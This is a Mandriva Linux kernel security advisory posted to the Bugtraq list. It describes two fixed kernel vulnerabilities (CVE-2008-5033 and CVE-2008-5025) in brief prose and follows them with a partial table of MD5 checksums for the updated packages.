by outgoing2.securityfocus.com (Postfix) with QMQP
id 73E8F1438AF; Mon, 29 Dec 2008 10:59:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12555 invoked from network); 29 Dec 2008 16:18:12 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 aEgF6649AFgayUfS7UA:9 a=mhgIF_BFmb1oZEPLJX4A:7 a=DSuu-HqpyDB9pA-R_QILDsOvhkUA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2008:246 ] kernel
Date: Mon, 29 Dec 2008 09:45:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LHLEj-0004Js-31@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:246
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kernel
 Date    : December 29, 2008
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 The chip_command function in drivers/media/video/tvaudio.c in the
 Linux kernel 2.6.25.x before 2.6.25.19, 2.6.26.x before 2.6.26.7,
 and 2.6.27.x before 2.6.27.3 allows attackers to cause a denial of
 service (NULL function pointer dereference and OOPS) via unknown
 vectors. (CVE-2008-5033)
 
 Stack-based buffer overflow in the hfs_cat_find_brec function
 in fs/hfs/catalog.c in the Linux kernel before 2.6.28-rc1 allows
 attackers to cause a denial of service (memory corruption or system
 crash) via an hfs filesystem image with an invalid catalog namelength
 field, a related issue to CVE-2008-4933. (CVE-2008-5025)
 
 Additionally, added enhancements for a newer revision of Nokia models
 6300, XpressMusic 5200, 5610 and 7610, the support for the ub USB
 module was disabled, added fixes for the Wake On LAN feature of the
 r8169 module, added fixes for suspend and resume on the i915 module,
 added ALSA fixes for Intel HDA, added workaround for a bug on iwlagn,
 added the m5602 driver,  fixed a crash on the ppscsi module, added
 fixes to the uvcvideo module.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5033
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5025
 https://qa.mandriva.com/45599
 https://qa.mandriva.com/41782
 https://qa.mandriva.com/44988
 https://qa.mandriva.com/44891
 https://qa.mandriva.com/45393
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 37f98091e898fdfffcce718686a078a9  2009.0/i586/alsa_raoppcm-kernel-2.6.27.7-desktop-1mnb-0.5.1-2mdv2008.0.i586.rpm
 66572c9481c70d20e84ad4d70571b6c3  2009.0/i586/alsa_raoppcm-kernel-2.6.27.7-desktop586-1mnb-0.5.1-2mdv2008.0.i586.rpm
 3577888ae72df1bdb6f13c32a68cff3a  2009.0/i586/alsa_raoppcm-kernel-2.6.27.7-server-1mnb-0.5.1-2mdv2008.0.i586.rpm
 909af87dac9e340d7689dfee2901f05e  2009.0/i586/alsa_raoppcm-kernel-desktop586-latest-0.5.1-1.20081219.2mdv2008.0.i586.rpm
 593fa01e37f8f10388f437487d9f8f7f  2009.0/i586/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20081219.2mdv2008.0.i586.rpm
 55f27e36bec7833b2d87d081dbe89a51  2009.0/i586/alsa_raoppcm-kernel-server-latest-0.5.1-1.20081219.2mdv2008.0.i586.rpm
 2f9ca79a8fdae1959cd62291f255026f  2009.0/i586/drm-experimental-kernel-2.6.27.7-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 4f16a1dc090e26c86628eb0007dd0469  2009.0/i586/drm-experimental-kernel-2.6.27.7-desktop586-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 c68b3a6b316999133f2f3f8bea872fae  2009.0/i586/drm-experimental-kernel-2.6.27.7-server-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 ac42d0a3ee6f18d62fab229703e89e8b  2009.0/i586/drm-experimental-kernel-desktop586-latest-2.3.0-1.20081219.2.20080912.1mdv2009.0.i586.rpm
 a1496ae2d95f4e9b5911bdd8d25b4386  2009.0/i586/drm-experimental-kernel-desktop-latest-2.3.0-1.20081219.2.20080912.1mdv2009.0.i586.rpm
 8766599911f8f8917fba3bd686c361f4  2009.0/i586/drm-experimental-kernel-server-latest-2.3.0-1.20081219.2.20080912.1mdv2009.0.i586.rpm
 f859e8433d6ffeccba4227bf8c95234f  2009.0/i586/et131x-kernel-2.6.27.7-desktop-1mnb-1.2.3-7mdv2009.0.i586.rpm
 f06aa8d960edf5e4c46545856cc62c88  2009.0/i586/et131x-kernel-2.6.27.7-desktop586-1mnb-1.2.3-7mdv2009.0.i586.rpm
 3b134d8da529f55fec578eb9be4ec5d5  2009.0/i586/et131x-kernel-2.6.27.7-server-1mnb-1.2.3-7mdv2009.0.i586.rpm
 a36115b3c53b73616d04e5e4a1ed34fb  2009.0/i586/et131x-kernel-desktop586-latest-1.2.3-1.20081219.7mdv2009.0.i586.rpm
 f9b4f955a1f07d62eae58d37d7fa4525  2009.0/i586/et131x-kernel-desktop-latest-1.2.3-1.20081219.7mdv2009.0.i586.rpm
 86f1d35e4b12139894803a25e53e8c22  2009.0/i586/et131x-kernel-server-latest-1.2.3-1.20081219.7mdv2009.0.i586.rpm
 505d20450a4386bc12ed1f996a500341  2009.0/i586/fcpci-kernel-2.6.27.7-desktop-1mnb-3.11.07-7mdv2009.0.i586.rpm
 43d8ef64361d2263df749510ed93f6d2  2009.0/i586/fcpci-kernel-2.6.27.7-desktop586-1mnb-3.11.07-7mdv2009.0.i586.rpm
 8bc80e9462cd2f8bf441f3f59298414e  2009.0/i586/fcpci-kernel-2.6.27.7-server-1mnb-3.11.07-7mdv2009.0.i586.rpm
 ae52318743a396e5e05df03e9ade9076  2009.0/i586/fcpci-kernel-desktop586-latest-3.11.07-1.20081219.7mdv2009.0.i586.rpm
 17069f4cc543326043b66bccc5cc6ef4  2009.0/i586/fcpci-kernel-desktop-latest-3.11.07-1.20081219.7mdv2009.0.i586.rpm
 489083aea74b4ff37d5995cefd09c25f  2009.0/i586/fcpci-kernel-server-latest-3.11.07-1.20081219.7mdv2009.0.i586.rpm
 32ea1a51a3c81a603f418156d94f110f  2009.0/i586/fglrx-kernel-2.6.27.7-desktop-1mnb-8.522-3mdv2009.0.i586.rpm
 76cb614d44414e8a0613b357f033089f  2009.0/i586/fglrx-kernel-2.6.27.7-desktop586-1mnb-8.522-3mdv2009.0.i586.rpm
 c374b638a6b58d1a89484576e49a4a7f  2009.0/i586/fglrx-kernel-2.6.27.7-server-1mnb-8.522-3mdv2009.0.i586.rpm
 80a7c371e6eb363dfc5a6b88e225ef96  2009.0/i586/fglrx-kernel-desktop586-latest-8.522-1.20081219.3mdv2009.0.i586.rpm
 8c179c93220521f4c6d04b3267e9f4fc  2009.0/i586/fglrx-kernel-desktop-latest-8.522-1.20081219.3mdv2009.0.i586.rpm
 4490501f7beb9c0a977479d46c214b03  2009.0/i586/fglrx-kernel-server-latest-8.522-1.20081219.3mdv2009.0.i586.rpm
 eafe4e5f640351d3d52e47df647bae6c  2009.0/i586/gnbd-kernel-2.6.27.7-desktop-1mnb-2.03.07-2mdv2009.0.i586.rpm
 12adfcac7573f6ffbc009914049d5609  2009.0/i586/gnbd-kernel-2.6.27.7-desktop586-1mnb-2.03.07-2mdv2009.0.i586.rpm
 7a605851c27dceb58d8827748954967c  2009.0/i586/gnbd-kernel-2.6.27.7-server-1mnb-2.03.07-2mdv2009.0.i586.rpm
 6f1930dbc9169d6c9b40bfde5ed012ac  2009.0/i586/gnbd-kernel-desktop586-latest-2.03.07-1.20081219.2mdv2009.0.i586.rpm
 e887b2cdbd2587200d4f60f5e16ed958  2009.0/i586/gnbd-kernel-desktop-latest-2.03.07-1.20081219.2mdv2009.0.i586.rpm
 c058222ee6aa4eff0b3cc71f6ecd9b8a  2009.0/i586/gnbd-kernel-server-latest-2.03.07-1.20081219.2mdv2009.0.i586.rpm
 7336609b4e76f844ddf800573e0b868e  2009.0/i586/hcfpcimodem-kernel-2.6.27.7-desktop-1mnb-1.17-1mdv2009.0.i586.rpm
 f55ae1c65923e3d56204928304c5eada  2009.0/i586/hcfpcimodem-kernel-2.6.27.7-desktop586-1mnb-1.17-1mdv2009.0.i586.rpm
 140ab94a20473719c0a1743100821403  2009.0/i586/hcfpcimodem-kernel-2.6.27.7-server-1mnb-1.17-1mdv2009.0.i586.rpm
 32b6c75d38705ccab8d2e18a49378d26  2009.0/i586/hcfpcimodem-kernel-desktop586-latest-1.17-1.20081219.1mdv2009.0.i586.rpm
 9240c45244f5efc1ddcd1ab7dc4d862d  2009.0/i586/hcfpcimodem-kernel-desktop-latest-1.17-1.20081219.1mdv2009.0.i586.rpm
 56808603c0ce1193464c1510d859cc85  2009.0/i586/hcfpcimodem-kernel-server-latest-1.17-1.20081219.1mdv2009.0.i586.rpm
 4cafb6baa8993fbb7820a8236b588d7c  2009.0/i586/hsfmodem-kernel-2.6.27.7-desktop-1mnb-7.68.00.13-1mdv2009.0.i586.rpm
 412cbcf0ffac04f6b97e1c2a3eaa38d3  2009.0/i586/hsfmodem-kernel-2.6.27.7-desktop586-1mnb-7.68.00.13-1mdv2009.0.i586.rpm
 1fff84cba7eedcef2a78181d40473a05  2009.0/i586/hsfmodem-kernel-2.6.27.7-server-1mnb-7.68.00.13-1mdv2009.0.i586.rpm
 f4c2bed3db737efd248039b90b9835b7  2009.0/i586/hsfmodem-kernel-desktop586-latest-7.68.00.13-1.20081219.1mdv2009.0.i586.rpm
 af9fa47eca9035ee172497fb87b33c93  2009.0/i586/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20081219.1mdv2009.0.i586.rpm
 616a0fc4e817a4c487a704e0d8d034e9  2009.0/i586/hsfmodem-kernel-server-latest-7.68.00.13-1.20081219.1mdv2009.0.i586.rpm
 3938438f0d95351cd99f513e76af38e4  2009.0/i586/hso-kernel-2.6.27.7-desktop-1mnb-1.2-2mdv2009.0.i586.rpm
 64006c49f38f54ac18e2a6626fec875e  2009.0/i586/hso-kernel-2.6.27.7-desktop586-1mnb-1.2-2mdv2009.0.i586.rpm
 a49aeed43def41dba7157881e7b38a0a  2009.0/i586/hso-kernel-2.6.27.7-server-1mnb-1.2-2mdv2009.0.i586.rpm
 180b3001f9fb72836aa86cca954fd9da  2009.0/i586/hso-kernel-desktop586-latest-1.2-1.20081219.2mdv2009.0.i586.rpm
 7bc72fe37da0cb6e027e44b6bc9f2df7  2009.0/i586/hso-kernel-desktop-latest-1.2-1.20081219.2mdv2009.0.i586.rpm
 854102840515a23f453ca8ebad8d67a7  2009.0/i586/hso-kernel-server-latest-1.2-1.20081219.2mdv2009.0.i586.rpm
 81be25f2da2b6b095e2b62fbe8abac76  2009.0/i586/iscsitarget-kernel-2.6.27.7-desktop-1mnb-0.4.16-4mdv2009.0.i586.rpm
 ba339d0e2f777358c65d9b9363f7e13b  2009.0/i586/iscsitarget-kernel-2.6.27.7-desktop586-1mnb-0.4.16-4mdv2009.0.i586.rpm
 d8a204b27ab0dcc0d1edee525a390b90  2009.0/i586/iscsitarget-kernel-2.6.27.7-server-1mnb-0.4.16-4mdv2009.0.i586.rpm
 55b3212ddc0b2422b31986498fb4e139  2009.0/i586/iscsitarget-kernel-desktop586-latest-0.4.16-1.20081219.4mdv2009.0.i586.rpm
 108bbe13f11a7fabe78a98617fb78f8a  2009.0/i586/iscsitarget-kernel-desktop-latest-0.4.16-1.20081219.4mdv2009.0.i586.rpm
 d2bc2851f042587cf2a68ad3ab0403d1  2009.0/i586/iscsitarget-kernel-server-latest-0.4.16-1.20081219.4mdv2009.0.i586.rpm
 df2a602467e32dd8dfbcafb331d0ba55  2009.0/i586/kernel-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 43a3430325ca7b4cfa8dbbc77e8dacd8  2009.0/i586/kernel-desktop-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 d7b7adb97084530f4021f0c46b6ee23f  2009.0/i586/kernel-desktop586-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 50617af7ebb2720cf439bd99668f477d  2009.0/i586/kernel-desktop586-devel-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 25ae40b34e309d2bed93d0e1bfaeb4d6  2009.0/i586/kernel-desktop586-devel-latest-2.6.27.7-1mnb2.i586.rpm
 e4837849530ba0783ea5c6df6b5ca02c  2009.0/i586/kernel-desktop586-latest-2.6.27.7-1mnb2.i586.rpm
 575081d59eee86c6c6a5899660273c74  2009.0/i586/kernel-desktop-devel-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 4064370634f96155a072ce0ccdea70b9  2009.0/i586/kernel-desktop-devel-latest-2.6.27.7-1mnb2.i586.rpm
 d823013741c020eae7a185c533c647fe  2009.0/i586/kernel-desktop-latest-2.6.27.7-1mnb2.i586.rpm
 0542e2bb4020c99cdb92c27fe7eae186  2009.0/i586/kernel-doc-2.6.27.7-1mnb2.i586.rpm
 f1edcede0084c07855413e83c7718ed8  2009.0/i586/kernel-server-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 6d054b4c99eb726919b187f5645a7bb8  2009.0/i586/kernel-server-devel-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 aa3fa78e34d1679970ce6b7b3af90398  2009.0/i586/kernel-server-devel-latest-2.6.27.7-1mnb2.i586.rpm
 5b3c6501a2cc1c34b5867e7247c8ffd9  2009.0/i586/kernel-server-latest-2.6.27.7-1mnb2.i586.rpm
 dd226c7f8df226da43e92747afec9834  2009.0/i586/kernel-source-2.6.27.7-1mnb-1-1mnb2.i586.rpm
 d523a7f3a6bf0a43e58e34a01d40e3e6  2009.0/i586/kernel-source-latest-2.6.27.7-1mnb2.i586.rpm
 226160b99ba37111b16a9b3c5c1436d1  2009.0/i586/kqemu-kernel-2.6.27.7-desktop-1mnb-1.4.0pre1-0.i586.rpm
 2aa58fbbc1cd83f73838440c04042705  2009.0/i586/kqemu-kernel-2.6.27.7-desktop586-1mnb-1.4.0pre1-0.i586.rpm
 8d700f6647cd860ad00ca9158dbab707  2009.0/i586/kqemu-kernel-2.6.27.7-server-1mnb-1.4.0pre1-0.i586.rpm
 305f0a1cd8cf4e2289779ecd17d77fac  2009.0/i586/kqemu-kernel-desktop586-latest-1.4.0pre1-1.20081219.0.i586.rpm
 751709801b982e0b7e77fcad0af85b5d  2009.0/i586/kqemu-kernel-desktop-latest-1.4.0pre1-1.20081219.0.i586.rpm
 2eabfca7d378d727ad772ac4eee43902  2009.0/i586/kqemu-kernel-server-latest-1.4.0pre1-1.20081219.0.i586.rpm
 c24c1ae87c25272e4945addee97aa86f  2009.0/i586/lirc-kernel-2.6.27.7-desktop-1mnb-0.8.3-4mdv2009.0.i586.rpm
 fd37d4301bb150b2cc847cd7994523b0  2009.0/i586/lirc-kernel-2.6.27.7-desktop586-1mnb-0.8.3-4mdv2009.0.i586.rpm
 81e6f03c720e85e8399f97a09c8cf0ec  2009.0/i586/lirc-kernel-2.6.27.7-server-1mnb-0.8.3-4mdv2009.0.i586.rpm
 d1256134a6517ce86b9adcce6694d42d  2009.0/i586/lirc-kernel-desktop586-latest-0.8.3-1.20081219.4mdv2009.0.i586.rpm
 8c07aa6fa5b3a9a62a47d8cd1fbcf3bc  2009.0/i586/lirc-kernel-desktop-latest-0.8.3-1.20081219.4mdv2009.0.i586.rpm
 aa95fe77013de2bc9b85a9cfcf014c24  2009.0/i586/lirc-kernel-server-latest-0.8.3-1.20081219.4mdv2009.0.i586.rpm
 97c1c5313f997a20e5721d83074b796f  2009.0/i586/lzma-kernel-2.6.27.7-desktop-1mnb-4.43-24mdv2009.0.i586.rpm
 3f0c376723fb04c64f2ca4252ce08890  2009.0/i586/lzma-kernel-2.6.27.7-desktop586-1mnb-4.43-24mdv2009.0.i586.rpm
 ed9b8b94fc80495816cf6ff58eaad980  2009.0/i586/lzma-kernel-2.6.27.7-server-1mnb-4.43-24mdv2009.0.i586.rpm
 8bada4ea693ee8e26347167937e8d876  2009.0/i586/lzma-kernel-desktop586-latest-4.43-1.20081219.24mdv2009.0.i586.rpm
 8196b4a7caaa356764491aa5c5b38439  2009.0/i586/lzma-kernel-desktop-latest-4.43-1.20081219.24mdv2009.0.i586.rpm
 9e6c4402b6af841bfe77d0e47b9d582d  2009.0/i586/lzma-kernel-server-latest-4.43-1.20081219.24mdv2009.0.i586.rpm
 fe9c96b951cc98d43eda1665bce61ea4  2009.0/i586/madwifi-kernel-2.6.27.7-desktop-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 0c81a81d62544625021ada1a933bd243  2009.0/i586/madwifi-kernel-2.6.27.7-desktop586-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 8911804834c986b49212bd3483cd1991  2009.0/i586/madwifi-kernel-2.6.27.7-server-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 77a623e37ee38ff3444a4957a373484a  2009.0/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20081219.3.r3835mdv2009.0.i586.rpm
 c9a32ec1063d078ffd3ae9eb5314326a  2009.0/i586/madwifi-kernel-desktop-latest-0.9.4-1.20081219.3.r3835mdv2009.0.i586.rpm
 74aa6206d9db942e43cf871d8703c6a0  2009.0/i586/madwifi-kernel-server-latest-0.9.4-1.20081219.3.r3835mdv2009.0.i586.rpm
 ede00416303c143b23862a4439444141  2009.0/i586/nvidia173-kernel-2.6.27.7-desktop-1mnb-173.14.12-4mdv2009.0.i586.rpm
 42cb5d262219a7d258062c107a49fdf3  2009.0/i586/nvidia173-kernel-2.6.27.7-desktop586-1mnb-173.14.12-4mdv2009.0.i586.rpm
 40cac8c4b38b054c308bdf1ea7337a88  2009.0/i586/nvidia173-kernel-desktop586-latest-173.14.12-1.20081219.4mdv2009.0.i586.rpm
 94dfa5ed3f28988b7feec9cd2159cd73  2009.0/i586/nvidia173-kernel-desktop-latest-173.14.12-1.20081219.4mdv2009.0.i586.rpm
 e43bf2f8ff885eccf3a5eda91a69d170  2009.0/i586/nvidia71xx-kernel-2.6.27.7-desktop-1mnb-71.86.06-5mdv2009.0.i586.rpm
 68cc6827707a88bee61d932d6ab069f8  2009.0/i586/nvidia71xx-kernel-2.6.27.7-desktop586-1mnb-71.86.06-5mdv2009.0.i586.rpm
 9d8b3f6d54e73c3dc3b550fa14226e07  2009.0/i586/nvidia71xx-kernel-2.6.27.7-server-1mnb-71.86.06-5mdv2009.0.i586.rpm
 886389426a362207014345a1b40c9a9d  2009.0/i586/nvidia71xx-kernel-desktop586-latest-71.86.06-1.20081219.5mdv2009.0.i586.rpm
 de60a5f07d03fa807a6c4899eebb855e  2009.0/i586/nvidia71xx-kernel-desktop-latest-71.86.06-1.20081219.5mdv2009.0.i586.rpm
 4bc37a2a9d4d482a4a41e0dc73493233  2009.0/i586/nvidia71xx-kernel-server-latest-71.86.06-1.20081219.5mdv2009.0.i586.rpm
 84f47984d88885736a1b8d458b068d5d  2009.0/i586/nvidia96xx-kernel-2.6.27.7-desktop-1mnb-96.43.07-5mdv2009.0.i586.rpm
 115e431b0df30db0baf7d52fb6c391e4  2009.0/i586/nvidia96xx-kernel-2.6.27.7-desktop586-1mnb-96.43.07-5mdv2009.0.i586.rpm
 0464eaa4b6c9d1fca63775598c9767d4  2009.0/i586/nvidia96xx-kernel-2.6.27.7-server-1mnb-96.43.07-5mdv2009.0.i586.rpm
 a3551c373a5416c4725301b02b6d7980  2009.0/i586/nvidia96xx-kernel-desktop586-latest-96.43.07-1.20081219.5mdv2009.0.i586.rpm
 db9ac74a9ea1d1fd51910f4c76b64254  2009.0/i586/nvidia96xx-kernel-desktop-latest-96.43.07-1.20081219.5mdv2009.0.i586.rpm
 980ae664bd6e59efb449c3decbc7edaf  2009.0/i586/nvidia96xx-kernel-server-latest-96.43.07-1.20081219.5mdv2009.0.i586.rpm
 36633e1d34c238b82706512989678cdf  2009.0/i586/nvidia-current-kernel-2.6.27.7-desktop-1mnb-177.70-2.3mdv2009.0.i586.rpm
 3d2e5b43ecae99b220646f9ed4635db4  2009.0/i586/nvidia-current-kernel-2.6.27.7-desktop586-1mnb-177.70-2.3mdv2009.0.i586.rpm
 295a9398137343cf7f2a5ffb674d1f3c  2009.0/i586/nvidia-current-kernel-2.6.27.7-server-1mnb-177.70-2.3mdv2009.0.i586.rpm
 219a86cce632564ec2408bbd00e04d37  2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20081219.2.3mdv2009.0.i586.rpm
 d65ccb6350a3fc921997cdb9f5fbc4c3  2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20081219.2.3mdv2009.0.i586.rpm
 946521c9d2e59c7dcf2f0dd6f3869b27  2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20081219.2.3mdv2009.0.i586.rpm
 ec9f756f1043f636a040ba8ca17b2476  2009.0/i586/omfs-kernel-2.6.27.7-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm
 ef65b066ee2f6531a9c8df7155c20291  2009.0/i586/omfs-kernel-2.6.27.7-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm
 8ab76ec81ff5a107ec7066cfcd496b47  2009.0/i586/omfs-kernel-2.6.27.7-server-1mnb-0.8.0-1mdv2009.0.i586.rpm
 200e63f34ed34193155442233beeef39  2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20081219.1mdv2009.0.i586.rpm
 319419641deb4919d1f8d5e1a18a7a3b  2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20081219.1mdv2009.0.i586.rpm
 0d05488713509d5bd45d854d5957112a  2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20081219.1mdv2009.0.i586.rpm
 8ef06b6b9680f0f62cf3cfa880ff330a  2009.0/i586/omnibook-kernel-2.6.27.7-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 a0c1eabbe27be6a7229373a455f00a94  2009.0/i586/omnibook-kernel-2.6.27.7-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 e1e15fe7037035c27c3e266990275828  2009.0/i586/omnibook-kernel-2.6.27.7-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 57b0780e75fe1fe29f41f4dec7988dbe  2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20081219.0.274.1mdv2009.0.i586.rpm
 907a0bc34eac425d9535ab59cef794c5  2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20081219.0.274.1mdv2009.0.i586.rpm
 2cebaa4eb9b097e3846f33327f77b4d3  2009.0/i586/omnibook-kernel-server-latest-20080513-1.20081219.0.274.1mdv2009.0.i586.rpm
 a6f6715551d095596e84534f3134a8e6  2009.0/i586/opencbm-kernel-2.6.27.7-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 02c7130775b144382ee045c94dfc05b7  2009.0/i586/opencbm-kernel-2.6.27.7-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 0032c6303d833429974dd42b096845ae  2009.0/i586/opencbm-kernel-2.6.27.7-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 6f40d653224977409444f577664fc93f  2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20081219.1mdv2008.1.i586.rpm
 d60bc14185cf63fa0536d4055acb72b3  2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20081219.1mdv2008.1.i586.rpm
 35507d88bc83250a5e5a1f4d4290d416  2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20081219.1mdv2008.1.i586.rpm
 5019cd97181dca4047cc0394e51dc022  2009.0/i586/ov51x-jpeg-kernel-2.6.27.7-desktop-1mnb-1.5.9-2mdv2009.0.i586.rpm
 7c888536a63b937eefb0eec375724736  2009.0/i586/ov51x-jpeg-kernel-2.6.27.7-desktop586-1mnb-1.5.9-2mdv2009.0.i586.rpm
 9d7eb549de71fe27727a4ddb733f9ce2  2009.0/i586/ov51x-jpeg-kernel-2.6.27.7-server-1mnb-1.5.9-2mdv2009.0.i586.rpm
 75c2ad0fcdfd2151d99d4746fa34bb35  2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.9-1.20081219.2mdv2009.0.i586.rpm
 f9ab1602610e534eaea4d29126ef73d0  2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20081219.2mdv2009.0.i586.rpm
 0392b2fa5f310483f7b81db1664f3e8d  2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.9-1.20081219.2mdv2009.0.i586.rpm
 4e58cad69af4ddb7d0da3a33c09e0e95  2009.0/i586/qc-usb-kernel-2.6.27.7-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm
 fe00facfb77bbc42707a0487031b9d02  2009.0/i586/qc-usb-kernel-2.6.27.7-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm
 d97ae9e624da228ce4af5023e14c08ae  2009.0/i586/qc-usb-kernel-2.6.27.7-server-1mnb-0.6.6-6mdv2009.0.i586.rpm
 96fd4929160f2f69cd186bd6b4f7c5f8  2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20081219.6mdv2009.0.i586.rpm
 7433d3d6663e93b2d1406c1f3b5b9da8  2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20081219.6mdv2009.0.i586.rpm
 ca55e04f98be826c2d127fdcaf6bdfac  2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20081219.6mdv2009.0.i586.rpm
 97ed3d265d55338e19a2e405132e401b  2009.0/i586/rt2860-kernel-2.6.27.7-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 b759d1865d08d5e6b108a7a9eb68a989  2009.0/i586/rt2860-kernel-2.6.27.7-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 a206931ac1c3c67fc920b717a3f3c2b8  2009.0/i586/rt2860-kernel-2.6.27.7-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 40d6153f8e1bbfd7adf8d3c6a9aa1488  2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20081219.2mdv2009.0.i586.rpm
 db8d09af8f59bd3137fd58df1d599359  2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20081219.2mdv2009.0.i586.rpm
 bf5bf113e05bcad2763a0eaea9a81542  2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20081219.2mdv2009.0.i586.rpm
 c7ef1cad703f713332ebabd46a0cc436  2009.0/i586/rt2870-kernel-2.6.27.7-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 34ef144ed6dcbb8f086531ef16556030  2009.0/i586/rt2870-kernel-2.6.27.7-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 45f22f5dbcb7303ade38f490e2593062  2009.0/i586/rt2870-kernel-2.6.27.7-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 95564792c6cbc163fcbc374ae543e916  2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20081219.2mdv2009.0.i586.rpm
 4a4c5db94e7eb7a45729e5709b55edb1  2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20081219.2mdv2009.0.i586.rpm
 c559924adbe662c13d360a366dc67ccc  2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20081219.2mdv2009.0.i586.rpm
 2856c96603a322cc0c5de36e517b3b6a  2009.0/i586/rtl8187se-kernel-2.6.27.7-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 338d8dc0b9b858e18ebbb68f01182ff8  2009.0/i586/rtl8187se-kernel-2.6.27.7-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 6a4adabef547ef2950bac5d9005d6449  2009.0/i586/rtl8187se-kernel-2.6.27.7-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 33d502bf5f20521f43dbe7a1fa64d948  2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20081219.1.1mdv2009.0.i586.rpm
 941d2bebc5244f3b13d2222c1f3d9756  2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20081219.1.1mdv2009.0.i586.rpm
 fb9cd9680ecc6ba70cefb71afc84d42c  2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20081219.1.1mdv2009.0.i586.rpm
 6b21450c1016e8f902f2ae3fd8fd9b09  2009.0/i586/slmodem-kernel-2.6.27.7-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 bbecbf212740ccff8e6ac8e3d92c019f  2009.0/i586/slmodem-kernel-2.6.27.7-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 1655b6abf583e3d948661a54ee1b3268  2009.0/i586/slmodem-kernel-2.6.27.7-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
